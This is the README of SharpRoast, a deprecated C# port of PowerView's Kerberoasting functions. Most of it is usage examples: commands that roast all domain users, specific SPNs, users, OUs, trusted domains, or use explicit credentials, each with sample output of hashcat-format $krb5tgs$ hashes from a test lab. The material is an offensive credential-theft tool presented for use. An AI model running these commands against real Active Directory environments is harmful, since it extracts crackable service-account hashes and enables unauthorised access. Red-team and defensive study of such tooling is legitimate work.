DEPRECATED SharpRoast is a C# port of various PowerView's Kerberoasting functionality.
SharpRoast is a C# port of various PowerView's Kerberoasting functionality. The KerberosRequestorSecurityToken.GetRequest Method() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.
@harmj0y is the primary author of this port.
SharpRoast is licensed under the BSD 3-Clause license.
Roast all users in the current domain:
C:\Temp>SharpRoast.exe all SamAccountName : harmj0y DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local ServicePrincipalName : asdf/asdfasdf Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...SamAccountName : sqlservice DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local ServicePrincipalName : MSSQLSvc/SQL.testlab.local Hash : $krb5tgs$23$$testlab.local$MSSQLSvc/SQL.testlab.local$9994D1...
...
Roast a specific SPN:
C:\Temp>SharpRoast.exe "asdf/asdfasdf" Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast a specific user in the current domain:
C:\Temp>SharpRoast.exe harmj0y SamAccountName : harmj0y DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local ServicePrincipalName : asdf/asdfasdf Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast users from a specified OU in the current domani:
C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local" SamAccountName : testuser2 DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local ServicePrincipalName : service/host Hash : $krb5tgs$23$*$testlab.local$service/host*$08A6462...
Roast a specific specific SPN in another (trusted) domain:
C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]" Hash : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...
Roast all users in another (trusted) domain:
C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local" SamAccountName : jason DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local ServicePrincipalName : test/test Hash : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...
Any of these commands also accept a [domain.com\user] [password] for to roast with explicit credentials. For example:
C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!" SamAccountName : harmj0y DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local ServicePrincipalName : asdf/asdfasdf Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)
SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.